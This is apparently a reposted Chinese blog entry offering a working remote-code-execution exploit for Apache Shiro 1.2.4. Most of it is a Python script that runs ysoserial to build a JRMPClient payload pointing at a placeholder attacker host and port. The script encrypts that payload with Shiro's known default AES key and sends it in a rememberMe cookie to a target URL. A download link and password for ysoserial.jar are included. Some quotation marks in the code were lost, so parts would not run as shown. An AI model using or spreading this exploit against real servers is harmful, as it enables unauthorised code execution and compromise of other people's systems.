码迷,mamicode.com
首页 > Web开发 > 详细

【实战】Apache Shiro 1.2.4 RCE

时间:2019-04-06 14:17:17      阅读:683      评论:0      收藏:0      [点我收藏+]

标签:timeout   def   target   std   uuid   ase   xca   ons   SOS   

poc:

#coding: utf-8
import os
import re
import sys
import base64
import uuid
import subprocess
import requests
from Crypto.Cipher import AES

JAR_FILE = ysoserial.jar

def attack(target,command):
    if not os.path.exists(JAR_FILE):
        raise Exception(jar file not found!)
    popen = subprocess.Popen([java, -jar, JAR_FILE, JRMPClient, command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    print(base64_ciphertext)
    try:
       response = requests.get(target, timeout=20, cookies={"rememberMe": base64_ciphertext.decode()})
       print (Request to target URL success)
    except Exception as e:
       print("[x] Request to target URL fail! {}".format(e))

if __name__ == __main__:
    url=sys.argv[1]
    attack(url, attackIP:1234)

需当前目录安装ysoserial.jar,链接:https://pan.baidu.com/s/1gdevU9QyguGSYr2ExBChqQ  密码:nsoi

实战截图:

技术图片

 

【实战】Apache Shiro 1.2.4 RCE

标签:timeout   def   target   std   uuid   ase   xca   ons   SOS   

原文地址:https://www.cnblogs.com/peterpan0707007/p/10661500.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!